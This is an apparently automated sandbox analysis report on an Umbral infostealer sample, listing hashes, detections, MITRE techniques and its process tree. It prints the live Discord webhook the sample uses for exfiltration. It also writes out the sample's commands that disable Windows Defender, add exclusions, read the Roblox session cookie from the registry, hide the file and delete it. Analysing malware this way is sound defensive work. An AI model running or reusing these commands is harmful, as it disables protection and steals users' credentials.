Analysis
-
max time kernel
552s -
max time network
434s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
25-07-2024 13:06
Static task
static1
General
-
Target
thegreatestexploits_services.exe
-
Size
1.2MB
-
MD5
aaaf987d8a27c805d177c6063b645be0
-
SHA1
64eda37efbbbc0cbedcd33f1594223d96d5b9803
-
SHA256
d864686dd77c81f89803fe21bc596b9188fd2b9ade88f618d60206a9e167953d
-
SHA512
5126f43fcf8e5f5f62f701b4575d7fd3dfc046614b0889d8dc73631ff876d5998d3f5994743847282270cfa20ba7911d206a41cba3e7327eb017f3fdbe9eefa3
-
SSDEEP
24576:UxRQjzTD/YM9mIqvJlk0/sFR1TbtXwiSwVizX5C1Wmmrj:YRYzTRMYT5btawQNCXmr
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1265015414048428153/VWNDpNZhZlKVwrtnGdcffRijkAKSf8EgngZwE8gCRJ90aR_H6BmlLSPeh2FFEO31-nto
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/memory/1496-2-0x0000000000A60000-0x0000000000ED0000-memory.dmp family_umbral behavioral1/memory/1496-134-0x0000000000A60000-0x0000000000ED0000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2660 powershell.exe 1784 powershell.exe 3964 powershell.exe 5088 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts thegreatestexploits_services.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 34 discord.com 35 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 1496 thegreatestexploits_services.exe 1496 thegreatestexploits_services.exe 1496 thegreatestexploits_services.exe -
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language thegreatestexploits_services.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3740 cmd.exe 992 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4244 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 992 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1496 thegreatestexploits_services.exe 2660 powershell.exe 2660 powershell.exe 5088 powershell.exe 5088 powershell.exe 1784 powershell.exe 1784 powershell.exe 4100 powershell.exe 4100 powershell.exe 3964 powershell.exe 3964 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1496 thegreatestexploits_services.exe Token: SeIncreaseQuotaPrivilege 3900 wmic.exe Token: SeSecurityPrivilege 3900 wmic.exe Token: SeTakeOwnershipPrivilege 3900 wmic.exe Token: SeLoadDriverPrivilege 3900 wmic.exe Token: SeSystemProfilePrivilege 3900 wmic.exe Token: SeSystemtimePrivilege 3900 wmic.exe Token: SeProfSingleProcessPrivilege 3900 wmic.exe Token: SeIncBasePriorityPrivilege 3900 wmic.exe Token: SeCreatePagefilePrivilege 3900 wmic.exe Token: SeBackupPrivilege 3900 wmic.exe Token: SeRestorePrivilege 3900 wmic.exe Token: SeShutdownPrivilege 3900 wmic.exe Token: SeDebugPrivilege 3900 wmic.exe Token: SeSystemEnvironmentPrivilege 3900 wmic.exe Token: SeRemoteShutdownPrivilege 3900 wmic.exe Token: SeUndockPrivilege 3900 wmic.exe Token: SeManageVolumePrivilege 3900 wmic.exe Token: 33 3900 wmic.exe Token: 34 3900 wmic.exe Token: 35 3900 wmic.exe Token: 36 3900 wmic.exe Token: SeIncreaseQuotaPrivilege 3900 wmic.exe Token: SeSecurityPrivilege 3900 wmic.exe Token: SeTakeOwnershipPrivilege 3900 wmic.exe Token: SeLoadDriverPrivilege 3900 wmic.exe Token: SeSystemProfilePrivilege 3900 wmic.exe Token: SeSystemtimePrivilege 3900 wmic.exe Token: SeProfSingleProcessPrivilege 3900 wmic.exe Token: SeIncBasePriorityPrivilege 3900 wmic.exe Token: SeCreatePagefilePrivilege 3900 wmic.exe Token: SeBackupPrivilege 3900 wmic.exe Token: SeRestorePrivilege 3900 wmic.exe Token: SeShutdownPrivilege 3900 wmic.exe Token: SeDebugPrivilege 3900 wmic.exe Token: SeSystemEnvironmentPrivilege 3900 wmic.exe Token: SeRemoteShutdownPrivilege 3900 wmic.exe Token: SeUndockPrivilege 3900 wmic.exe Token: SeManageVolumePrivilege 3900 wmic.exe Token: 33 3900 wmic.exe Token: 34 3900 wmic.exe Token: 35 3900 wmic.exe Token: 36 3900 wmic.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeDebugPrivilege 1784 powershell.exe Token: SeDebugPrivilege 4100 powershell.exe Token: SeIncreaseQuotaPrivilege 1676 wmic.exe Token: SeSecurityPrivilege 1676 wmic.exe Token: SeTakeOwnershipPrivilege 1676 wmic.exe Token: SeLoadDriverPrivilege 1676 wmic.exe Token: SeSystemProfilePrivilege 1676 wmic.exe Token: SeSystemtimePrivilege 1676 wmic.exe Token: SeProfSingleProcessPrivilege 1676 wmic.exe Token: SeIncBasePriorityPrivilege 1676 wmic.exe Token: SeCreatePagefilePrivilege 1676 wmic.exe Token: SeBackupPrivilege 1676 wmic.exe Token: SeRestorePrivilege 1676 wmic.exe Token: SeShutdownPrivilege 1676 wmic.exe Token: SeDebugPrivilege 1676 wmic.exe Token: SeSystemEnvironmentPrivilege 1676 wmic.exe Token: SeRemoteShutdownPrivilege 1676 wmic.exe Token: SeUndockPrivilege 1676 wmic.exe Token: SeManageVolumePrivilege 1676 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1496 thegreatestexploits_services.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 1496 wrote to memory of 3900 1496 thegreatestexploits_services.exe 89 PID 1496 wrote to memory of 3900 1496 thegreatestexploits_services.exe 89 PID 1496 wrote to memory of 3900 1496 thegreatestexploits_services.exe 89 PID 1496 wrote to memory of 4076 1496 thegreatestexploits_services.exe 92 PID 1496 wrote to memory of 4076 1496 thegreatestexploits_services.exe 92 PID 1496 wrote to memory of 4076 1496 thegreatestexploits_services.exe 92 PID 1496 wrote to memory of 2660 1496 thegreatestexploits_services.exe 94 PID 1496 wrote to memory of 2660 1496 thegreatestexploits_services.exe 94 PID 1496 wrote to memory of 2660 1496 thegreatestexploits_services.exe 94 PID 1496 wrote to memory of 5088 1496 thegreatestexploits_services.exe 100 PID 1496 wrote to memory of 5088 1496 thegreatestexploits_services.exe 100 PID 1496 wrote to memory of 5088 1496 thegreatestexploits_services.exe 100 PID 1496 wrote to memory of 1784 1496 thegreatestexploits_services.exe 102 PID 1496 wrote to memory of 1784 1496 thegreatestexploits_services.exe 102 PID 1496 wrote to memory of 1784 1496 thegreatestexploits_services.exe 102 PID 1496 wrote to memory of 4100 1496 thegreatestexploits_services.exe 105 PID 1496 wrote to memory of 4100 1496 thegreatestexploits_services.exe 105 PID 1496 wrote to memory of 4100 1496 thegreatestexploits_services.exe 105 PID 1496 wrote to memory of 1676 1496 thegreatestexploits_services.exe 107 PID 1496 wrote to memory of 1676 1496 thegreatestexploits_services.exe 107 PID 1496 wrote to memory of 1676 1496 thegreatestexploits_services.exe 107 PID 1496 wrote to memory of 1680 1496 thegreatestexploits_services.exe 109 PID 1496 wrote to memory of 1680 1496 thegreatestexploits_services.exe 109 PID 1496 wrote to memory of 1680 1496 thegreatestexploits_services.exe 109 PID 1496 wrote to memory of 1360 1496 thegreatestexploits_services.exe 111 PID 1496 wrote to memory of 1360 1496 thegreatestexploits_services.exe 111 PID 1496 wrote to memory of 1360 1496 thegreatestexploits_services.exe 111 PID 1496 wrote to memory of 3964 1496 thegreatestexploits_services.exe 113 PID 1496 wrote to memory of 3964 1496 thegreatestexploits_services.exe 113 PID 1496 wrote to memory of 3964 1496 thegreatestexploits_services.exe 113 PID 1496 wrote to memory of 4244 1496 thegreatestexploits_services.exe 117 PID 1496 wrote to memory of 4244 1496 thegreatestexploits_services.exe 117 PID 1496 wrote to memory of 4244 1496 thegreatestexploits_services.exe 117 PID 1496 wrote to memory of 3740 1496 thegreatestexploits_services.exe 119 PID 1496 wrote to memory of 3740 1496 thegreatestexploits_services.exe 119 PID 1496 wrote to memory of 3740 1496 thegreatestexploits_services.exe 119 PID 3740 wrote to memory of 992 3740 cmd.exe 121 PID 3740 wrote to memory of 992 3740 cmd.exe 121 PID 3740 wrote to memory of 992 3740 cmd.exe 121 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4076 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\thegreatestexploits_services.exe"C:\Users\Admin\AppData\Local\Temp\thegreatestexploits_services.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
C:\Windows\SysWOW64\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\thegreatestexploits_services.exe"2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4076
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\thegreatestexploits_services.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4100
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- System Location Discovery: System Language Discovery
PID:1680
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- System Location Discovery: System Language Discovery
PID:1360
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3964
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:4244
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\thegreatestexploits_services.exe" && pause2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3740 -
C:\Windows\SysWOW64\PING.EXEping localhost3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:992
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
18KB
MD5c603e58227141138e6c9fff2bf883944
SHA1dc237b22682910255d5cf6ad64fc72ad7f2f4dc4
SHA25625d1e64c958f984091f22adc65620f3a637418cf63c8a4bfdf538174019a0223
SHA5126e286459dc9c776e33063b6b0c762c146b31d6a34b0c58462f36a869024c2ea0c3f826f5d162b932f3e7e613e778f231f8c29b0fd396fbb9651b1aa486d53d5f
-
Filesize
17KB
MD53ab8a5acf14ab557fde2c49155fccbae
SHA1dbeefc137b8915afabfe245790deb61ba8bbf9fd
SHA256889eff563088318c6851f162a75956f72636b587d22840347f8d40cebcc24ae9
SHA5122c8d2f1a5893610a03ecd5112755c867b83ebe982a952ea215fac4a4913115d2461e85ba3689efee2d96d7cae68cc552c762fac304c35f89eea5ec5b77479ea3
-
Filesize
18KB
MD51966ccfe818b23b5419e03b478f30682
SHA12008cb9e42c46d8feab7fe2f76e9612f1d9326a5
SHA256f73db08dca28783b0f53cdad45451c7671e75e3ba693bd7cedec26ad2c830cc3
SHA51220af013d34e66b8509f0681c11fa3e26490cd2fcc6f0fb7112bbaecf2cc2c79db281dd2f605ebfd145b48e66bff8f9a70acf5bdcad8a9ac798390ac9976e43aa
-
Filesize
15KB
MD540832fccdba1dd0f2c3719bdc857d876
SHA1516c23bd9a638d2ef80c597ecb2069cd55f4c77f
SHA2566b3fb612b0ae0f464104fe5dbbe38dccc681384241fd0e944a229794d0a84ced
SHA512137e8b52d46034d72bf24732c6fc70033879b705069a3461c97b7d34f9bec1c4700c67b65e4e4f7da88b2b14164872b107e46a6223416af0f7f5c219033b42cf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82